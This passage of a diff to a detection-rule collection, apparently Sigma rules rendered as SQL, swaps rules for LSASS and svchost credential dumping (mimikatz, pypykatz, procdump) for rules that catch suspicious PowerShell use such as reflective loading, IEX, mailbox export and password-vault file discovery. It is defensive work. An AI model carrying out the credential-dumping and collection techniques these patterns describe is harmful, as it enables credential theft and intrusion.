that could indicate the use of a PowerShell exploitation framework", + "author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar), Tuan Le (NCSGroup)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%libffi-7.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python3%.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%System.Reflection.Assembly.Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.Reflection.AssemblyName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Reflection.Emit.AssemblyBuilderAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Reflection.Emit.CustomAttributeBuilder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Runtime.InteropServices.UnmanagedType%' ESCAPE '\\' OR ScriptBlockText LIKE '%Runtime.InteropServices.DllImportAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%SuspendThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%rundll32%' ESCAPE '\\'))" ], - "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml" + "filename": "posh_ps_susp_keywords.yml" }, { - "title": "SVCHOST Credential Dump", - "id": "174afcfa-6e40-4ae9-af64-496546389294", + "title": "Recon Information for Export with PowerShell", + "id": 
"a9723fcc-881c-424c-8709-fd61442ab3c3", "status": "test", - "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", - "author": "Florent Labouyrie", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data", + "author": "frack113", "tags": [ - "attack.t1548" + "attack.collection", + "attack.t1119" ], "falsepositives": [ - "Non identified legit exectubale" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x143a') AND NOT ((SourceImage LIKE '%\\\\services.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-Service %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChildItem %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Process %' ESCAPE '\\') AND ScriptBlockText LIKE '%> $env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "proc_access_win_svchost_cred_dump.yml" + "filename": "posh_ps_susp_recon_export.yml" }, { - "title": "LSASS Memory Access by Tool Named Dump", - "id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", - "status": "test", - "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", - "author": "Florian Roth (Nextron Systems)", + "title": "Powershell XML Execute Command", + "id": "6c6c6282-7671-4fe9-a0ce-a2dcebdc342b", + "status": "experimental", + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. 
(Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare programs that contain the word dump in their name and access lsass" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%dump%' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Xml.XmlDocument%' ESCAPE '\\' AND 
ScriptBlockText LIKE '%.Load%' ESCAPE '\\' AND (ScriptBlockText LIKE '%IEX %' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Expression %' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Command %' ESCAPE '\\' OR ScriptBlockText LIKE '%ICM -%' ESCAPE '\\'))" ], - "filename": "proc_access_win_lsass_memdump_indicators.yml" + "filename": "posh_ps_xml_iex.yml" }, { - "title": "LSASS Access from White-Listed Processes", - "id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", + "title": "Automated Collection Command PowerShell", + "id": "c1dda054-d638-4c16-afc8-53e007f3fbc5", "status": "test", - "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", - "author": "Florian Roth (Nextron Systems)", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.collection", + "attack.t1119" ], "falsepositives": [ - "Unlikely, since these tools shouldn't access lsass.exe at all" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (SourceImage LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ProcessDump.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dump64.exe' ESCAPE '\\') AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE 
'%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%.doc%' ESCAPE '\\' OR ScriptBlockText LIKE '%.docx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.xls%' ESCAPE '\\' OR ScriptBlockText LIKE '%.xlsx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.ppt%' ESCAPE '\\' OR ScriptBlockText LIKE '%.pptx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.rtf%' ESCAPE '\\' OR ScriptBlockText LIKE '%.pdf%' ESCAPE '\\' OR ScriptBlockText LIKE '%.txt%' ESCAPE '\\') AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Recurse %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Include %' ESCAPE '\\')" ], - "filename": "proc_access_win_lsass_memdump_evasion.yml" + "filename": "posh_ps_automated_collection.yml" }, { - "title": "LittleCorporal Generated Maldoc Injection", - "id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", + "title": "Suspicious PowerShell Mailbox Export to Share - PS", + "id": "4a241dea-235b-4a7e-8d76-50d817b146c4", "status": "experimental", - "description": "Detects the process injection of a LittleCorporal generated Maldoc.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", 
+ "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1055.003" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' AND CallTrace LIKE '%:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.%' ESCAPE '\\' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_access_win_littlecorporal_generated_maldoc.yml" + "filename": "posh_ps_mailboxexport_share.yml" }, { - "title": "WerFault Accassing LSASS", - "id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", + "title": "Testing Usage of Uncommonly Used Port", + "id": "adf876b3-f1f8-4aa9-a4e4-a64106feec06", "status": "test", - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may communicate using a protocol and port paring that are typically not associated.\nFor example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.command_and_control", + "attack.t1571" ], "falsepositives": [ - "Actual failures in lsass.exe that trigger a crash dump (unlikely)", - "Unknown cases in which 
WerFault accesses lsass.exe" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Test-NetConnection%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComputerName %' ESCAPE '\\' AND ScriptBlockText LIKE '%-port %' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '% 443 %' ESCAPE '\\' OR ScriptBlockText LIKE '% 80 %' ESCAPE '\\')))" ], - "filename": "proc_access_win_lsass_werfault.yml" + "filename": "posh_ps_test_netconnection.yml" }, { - "title": "Malware Shellcode in Verclsid Target Process", - "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", - "status": "test", - "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", - "author": "John Lambert (tech), Florian Roth (Nextron Systems)", + "title": "Powershell Sensitive File Discovery", + "id": "7d416556-6502-45b2-9bad-9d2f05f38997", + "status": "experimental", + "description": "Detect adversaries enumerate sensitive files", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.discovery", + "attack.t1083" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\verclsid.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF') AND ((CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%VBE7.DLL%' ESCAPE '\\') OR (SourceImage LIKE '%\\\\Microsoft Office\\\\%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN%' ESCAPE 
'\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%ls%' ESCAPE '\\' OR ScriptBlockText LIKE '%get-childitem%' ESCAPE '\\' OR ScriptBlockText LIKE '%gci%' ESCAPE '\\') AND ScriptBlockText LIKE '%-recurse%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.pass%' ESCAPE '\\' OR ScriptBlockText LIKE '%.kdbx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.kdb%' ESCAPE '\\'))" ], - "filename": "proc_access_win_malware_verclsid_shellcode.yml" + "filename": "posh_ps_sensitive_file_discovery.yml" }, { - "title": "LSASS Access from Program in Suspicious Folder", - "id": "fa34b441-961a-42fa-a100-ecc28c886725", + "title": "Invoke-Obfuscation Via Stdin - Powershell", + "id": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess 
LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\') AND (SourceImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Temporary%' ESCAPE '\\')) AND NOT ((SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebexMTA.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\') AND GrantedAccess = '0x410') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR SourceImage LIKE 
'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\%' ESCAPE '\\') AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1fffff', '0x1010', '0x101010')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\GoogleUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x410') OR ((SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND GrantedAccess = '0x1410')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"')" ], - "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml" + "filename": "posh_ps_invoke_obfuscation_via_stdin.yml" }, { - "title": "Mimikatz through Windows Remote Management", - "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", - "status": "stable", - "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", - "author": "Patryk Prauze - ING Tech", + "title": "Detected Windows Software Discovery - PowerShell", + "id": "2650dd1a-eb2a-412d-ac36-83f06c4f2282", + "status": "experimental", 
+ "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006", - "attack.s0002" + "attack.discovery", + "attack.t1518" ], "falsepositives": [ - "Unlikely" + "Legitimate administration activities" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wsmprovhost.exe' ESCAPE '\\') AND NOT (GrantedAccess = '0x80000000'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-itemProperty%' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\software\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%select-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%format-table%' ESCAPE '\\')" ], - "filename": "proc_access_win_mimikatz_trough_winrm.yml" + "filename": "posh_ps_software_discovery.yml" }, { - "title": "Suspicious GrantedAccess Flags on LSASS Access", - "id": "a18dd26b-6450-46de-8c91-9659150cf088", + "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell", + "id": "e55a5195-4724-480e-a77e-3ebe64bd3759", "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.defense_evasion", + "attack.t1027", + 
"attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate software such as AV and EDR" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Users\\\\%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' 
OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\MRT.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\') AND GrantedAccess = '0x1fffff')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%set%' ESCAPE '\\' AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%mshta%' ESCAPE '\\' AND ScriptBlockText LIKE 
